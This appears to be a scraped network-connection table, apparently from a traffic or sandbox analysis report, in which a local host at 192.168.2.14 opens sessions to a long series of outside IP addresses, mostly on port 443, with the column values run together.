                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15090192.168.2.1451608129.136.119.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15091192.168.2.144364241.232.10.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15092192.168.2.145518294.79.172.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15093192.168.2.1442896123.16.121.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15094192.168.2.1435276114.44.147.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15095192.168.2.144554442.101.175.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15096192.168.2.145549673.193.191.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15097192.168.2.1437426208.138.169.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15098192.168.2.1449592217.124.94.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15099192.168.2.145689670.249.164.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15100192.168.2.146058480.32.134.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15101192.168.2.1444644202.91.25.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15102192.168.2.1451336178.163.38.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15103192.168.2.1444540213.229.189.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15104192.168.2.145771088.185.61.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15105192.168.2.144165470.144.161.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15106192.168.2.1438784193.23.217.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15107192.168.2.145605682.239.128.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15108192.168.2.144908299.140.165.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15109192.168.2.145033853.47.251.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15110192.168.2.145624413.176.116.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15111192.168.2.1460686114.47.176.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15112192.168.2.1443792123.98.2.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15113192.168.2.144672242.211.235.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15114192.168.2.1437306116.249.199.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15115192.168.2.1454976205.100.211.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15116192.168.2.1449234209.162.183.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15117192.168.2.1446968107.25.124.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15118192.168.2.143618890.128.93.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15119192.168.2.145613874.230.14.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15120192.168.2.144584227.146.33.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15121192.168.2.1446882147.172.253.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15122192.168.2.145943067.96.11.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15123192.168.2.1434552114.69.36.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15124192.168.2.1447214143.97.173.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15125192.168.2.144176853.251.105.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15126192.168.2.143727890.129.140.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15127192.168.2.1451996126.107.92.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15128192.168.2.145558499.16.76.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15129192.168.2.1437590177.60.207.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15130192.168.2.1445728129.55.111.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15131192.168.2.1443238147.60.210.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15132192.168.2.145578886.134.231.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15133192.168.2.1451646146.240.33.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15134192.168.2.1446164213.47.208.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15135192.168.2.1435196191.221.165.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15136192.168.2.1436802222.235.180.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15137192.168.2.1455434182.82.142.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15138192.168.2.1448242178.242.204.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15139192.168.2.1452774223.61.239.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15140192.168.2.145611451.233.131.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15141192.168.2.1440182130.52.139.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15142192.168.2.144613291.110.143.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15143192.168.2.144754441.112.18.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15144192.168.2.1448676162.118.239.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15145192.168.2.1446500216.51.196.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15146192.168.2.144250219.101.1.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15147192.168.2.1436556157.134.79.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15148192.168.2.1441664176.69.123.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15149192.168.2.1460536210.249.192.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15150192.168.2.1458620199.113.229.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15151192.168.2.144402277.61.187.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15152192.168.2.1436052187.211.35.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15153192.168.2.1440040183.71.255.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15154192.168.2.145215232.27.152.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15155192.168.2.1453920206.225.58.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15156192.168.2.14501361.162.64.848080
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15157192.168.2.145219454.227.103.1098080
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15158192.168.2.143697899.12.115.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15159192.168.2.145970469.56.0.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15160192.168.2.143555213.94.24.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15161192.168.2.144284013.236.147.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15162192.168.2.144420244.219.87.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15163192.168.2.1434228122.70.239.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15164192.168.2.1436618135.136.163.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15165192.168.2.1458770171.204.113.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15166192.168.2.1455708167.31.147.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15167192.168.2.144052423.245.109.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15168192.168.2.1445236179.255.192.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15169192.168.2.1434560182.109.142.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15170192.168.2.144904882.186.165.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15171192.168.2.144218882.1.64.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15172192.168.2.1459558207.34.137.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15173192.168.2.1449688200.248.210.238443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15174192.168.2.14370209.25.108.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15175192.168.2.1448040126.228.135.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15176192.168.2.1451244217.142.172.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15177192.168.2.1435396171.137.27.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15178192.168.2.1439928123.147.201.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15179192.168.2.1437302174.123.157.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15180192.168.2.144980685.132.191.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15181192.168.2.144045499.168.127.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15182192.168.2.144919436.57.248.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15183192.168.2.144258020.186.100.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15184192.168.2.143989263.185.198.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15185192.168.2.1458720220.57.77.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15186192.168.2.1446732216.26.18.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15187192.168.2.1443072113.46.254.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15188192.168.2.14440684.243.108.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15189192.168.2.144234660.122.192.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15190192.168.2.1442616123.239.101.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15191192.168.2.144644885.134.48.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15192192.168.2.1446452157.186.3.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15193192.168.2.1433644122.4.119.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15194192.168.2.145779269.111.177.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15195192.168.2.1441650100.174.88.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15196192.168.2.1453844101.152.198.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15197192.168.2.143602619.149.4.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15198192.168.2.1436850102.41.128.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15199192.168.2.144659262.227.54.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15200192.168.2.1446506142.135.106.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15201192.168.2.1440622218.101.163.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15202192.168.2.1455632151.207.68.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15203192.168.2.1456528110.103.220.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15204192.168.2.1459624158.97.3.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15205192.168.2.145699497.128.39.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15206192.168.2.1451776100.49.48.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15207192.168.2.143515643.14.87.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15208192.168.2.1458408108.40.126.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15209192.168.2.14574201.58.175.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15210192.168.2.144076278.147.208.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15211192.168.2.145290477.26.64.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15212192.168.2.1458484152.248.6.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15213192.168.2.1435866149.116.165.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15214192.168.2.143669843.168.236.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15215192.168.2.1434920190.239.67.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15216192.168.2.1434228149.170.151.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15217192.168.2.145439820.216.53.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15218192.168.2.146086289.100.73.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15219192.168.2.1448878173.208.64.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15220192.168.2.1440000201.174.250.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15221192.168.2.1458180134.113.82.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15222192.168.2.144309244.234.33.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15223192.168.2.1432800219.84.190.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15224192.168.2.144922076.232.133.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15225192.168.2.144091875.129.150.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15226192.168.2.1440082213.246.80.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15227192.168.2.1442192217.101.101.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15228192.168.2.1433808114.120.44.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15229192.168.2.144943839.222.65.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15230192.168.2.1435748183.48.223.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15231192.168.2.145953270.69.112.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15232192.168.2.1441026108.152.109.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15233192.168.2.143814491.156.77.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15234192.168.2.1451136173.199.188.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15235192.168.2.143901445.238.16.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15236192.168.2.1435528131.220.236.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15237192.168.2.144169089.165.152.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15238192.168.2.1451534208.2.53.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15239192.168.2.1459234153.91.201.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15240192.168.2.1442508202.200.134.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15241192.168.2.14585104.116.170.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15242192.168.2.143687823.213.224.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15243192.168.2.144875499.88.148.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15244192.168.2.1434774163.17.243.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15245192.168.2.1453588196.158.192.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15246192.168.2.1437528113.222.9.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15247192.168.2.145272013.132.43.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15248192.168.2.1446924193.125.12.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15249192.168.2.145607444.246.254.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15250192.168.2.145556447.187.157.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15251192.168.2.145714880.127.215.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15252192.168.2.1455986172.175.75.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15253192.168.2.1441080210.223.139.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15254192.168.2.1446032129.252.188.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15255192.168.2.1438668120.130.142.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15256192.168.2.1435420120.76.141.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15257192.168.2.144766095.2.245.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15258192.168.2.145862219.45.14.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15259192.168.2.1442016122.3.137.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15260192.168.2.143715272.170.153.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15261192.168.2.1455374160.244.254.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15262192.168.2.1439480211.100.116.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15263192.168.2.1455506104.249.110.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15264192.168.2.1439188195.73.123.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15265192.168.2.1451378140.83.122.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15266192.168.2.145211460.3.21.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15267192.168.2.1452578188.52.66.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15268192.168.2.146035813.239.24.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15269192.168.2.143680076.103.80.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15270192.168.2.1439332155.20.198.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15271192.168.2.1436940118.97.111.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15272192.168.2.145788478.136.2.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15273192.168.2.1454468208.174.31.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15274192.168.2.145385698.227.202.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15275192.168.2.145680231.171.108.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15276192.168.2.1443688219.99.111.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15277192.168.2.143379099.186.66.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15278192.168.2.145025079.22.194.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15279192.168.2.1458854176.243.169.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15280192.168.2.1438200126.17.253.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15281192.168.2.1454354141.11.12.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15282192.168.2.145922613.39.219.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15283192.168.2.1438952199.161.110.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15284192.168.2.1441082152.97.191.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15285192.168.2.1452924192.8.131.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15286192.168.2.1456198219.226.130.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15287192.168.2.1448062136.227.102.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15288192.168.2.144725894.37.72.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15289192.168.2.145216445.93.162.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15290192.168.2.1440934157.210.143.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15291192.168.2.1436162129.19.22.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15292192.168.2.1436070198.216.92.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15293192.168.2.144931837.1.171.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15294192.168.2.1457840136.116.80.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15295192.168.2.145867412.23.208.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15296192.168.2.1442914166.205.64.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15297192.168.2.143944276.16.112.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15298192.168.2.145438894.163.139.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15299192.168.2.1452190111.195.81.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15300192.168.2.1446888208.15.177.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15301192.168.2.1452070172.233.99.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15302192.168.2.143983035.209.83.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15303192.168.2.1446356142.197.108.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15304192.168.2.144880493.45.210.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15305192.168.2.1452356200.246.100.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15306192.168.2.1454030173.45.18.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15307192.168.2.1457286192.160.49.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15308192.168.2.1459280156.41.118.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15309192.168.2.144413254.126.250.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15310192.168.2.145573454.251.11.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
